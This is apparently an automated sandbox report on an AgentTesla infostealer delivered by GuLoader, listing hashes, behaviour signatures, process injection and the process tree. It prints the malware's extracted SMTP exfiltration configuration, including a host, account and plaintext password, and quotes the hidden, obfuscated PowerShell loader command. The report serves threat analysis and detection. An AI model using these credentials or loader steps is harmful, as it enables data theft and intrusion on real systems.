Analysis
max time kernel: 152s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/04/2024, 01:29

Static task: static1

Behavioral task: behavioral1
  Sample: 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
  Resource: win10v2004-20240226-en

Behavioral task: behavioral3
  Sample: Borteskamoteringers/Fridtjof.ps1
  Resource: win7-20240221-en

Behavioral task: behavioral4
  Sample: Borteskamoteringers/Fridtjof.ps1
  Resource: win10v2004-20240226-en
General
Target: 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
Size: 652KB
MD5: 7971d20d1b569b51e56f37fc734a1c81
SHA1: 3c1a1fa66cd9890c8e0021853d39ab7b3aefc5c7
SHA256: 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b
SHA512: 6efbec26eebfcaeed965a46ab22f4870fc6fa93d09818c7cf03782f34c8a768b4defa5b9b1f347ef41798df82c725a3f5a402793d977e6d791fe5b857d36c6a4
SSDEEP: 12288:nXRAvufNFTr7L/R90rJ2RPBY+K9Yc65vpNpqwDwmuu6TNxFu+i:nXRyUNJr7L30N2RJXKz65vprPqu6hxF+
Malware Config
Extracted
agenttesla
  Protocol: smtp
  Host: cp8nl.hyperhost.ua
  Port: 587
  Username: [email protected]
  Password: 7213575aceACE@#$
  Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  39    drive.google.com
  40    drive.google.com
- Drops file in System32 directory (1 IoCs)
  description                   ioc                                 Process
  File opened for modification  C:\Windows\SysWOW64\skillfully.ins  3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid   Process
  4108  wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  3452  powershell.exe
  4108  wab.exe
- Suspicious use of SetThreadContext (1 IoCs)
  description                          pid   Process         procid_target
  PID 3452 set thread context of 4108  3452  powershell.exe  106
- Drops file in Program Files directory (1 IoCs)
  description   ioc                                             Process
  File created  C:\Program Files (x86)\Common Files\ukases.lnk  3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
- Drops file in Windows directory (1 IoCs)
  description   ioc                                               Process
  File created  C:\Windows\resources\tuskish\smilehuller.lnk  3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid   Process
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  3452  powershell.exe
  4108  wab.exe
  4108  wab.exe
- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid   Process
  3452  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  3452  powershell.exe
  Token: SeDebugPrivilege  4108  wab.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                       pid   Process                                                               procid_target
  PID 4896 wrote to memory of 3452  4896  3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe  94
  PID 4896 wrote to memory of 3452  4896  3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe  94
  PID 4896 wrote to memory of 3452  4896  3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe  94
  PID 3452 wrote to memory of 4412  3452  powershell.exe                                                        104
  PID 3452 wrote to memory of 4412  3452  powershell.exe                                                        104
  PID 3452 wrote to memory of 4412  3452  powershell.exe                                                        104
  PID 3452 wrote to memory of 4108  3452  powershell.exe                                                        106
  PID 3452 wrote to memory of 4108  3452  powershell.exe                                                        106
  PID 3452 wrote to memory of 4108  3452  powershell.exe                                                        106
  PID 3452 wrote to memory of 4108  3452  powershell.exe                                                        106
  PID 3452 wrote to memory of 4108  3452  powershell.exe                                                        106
Processes
- C:\Users\Admin\AppData\Local\Temp\3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe"
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID: 4896
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Begavede=Get-Content 'C:\Users\Admin\AppData\Local\Ubarberet\Borteskamoteringers\Fridtjof.Bea';$Alpelandet=$Begavede.SubString(59880,3);.$Alpelandet($Begavede)"
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3452
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      PID: 4412
    - C:\Program Files (x86)\windows mail\wab.exe
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1040 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
  PID: 1372
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 58KB
  MD5: b747bba9cd5ec658f83a8f004b9ddc9b
  SHA1: eb25e589a4de7af6afd91ccaf9c12f30aaf3c67a
  SHA256: 4fc178d7b0c912917422d5259e796c28f38a765bc3f56fa14df7480b49a0f2f2
  SHA512: 7e115a0e8cc9b16cd7eeafc6aa6635815763384ab543bb92308c197af849a49e9109f775652151617dc094862313109830091f5d203f582a887595b81b875d9e
- Filesize: 350KB
  MD5: 5a078e54f0d5d5d90111e92881a45f0b
  SHA1: 96c2419b4e1f9609e11bab95c051780d5a812a3d
  SHA256: cec934596d590684641da052fa5d39b119c7b668c28925e196213d4258ac75b0
  SHA512: d6b893adddd088f8c03389a31d10c6b87c0f67f1620739c02821e2f51d4b785abb512fc1e550ba08b653569069d37e62c1f8a54a55845d2b346f9eebb061f569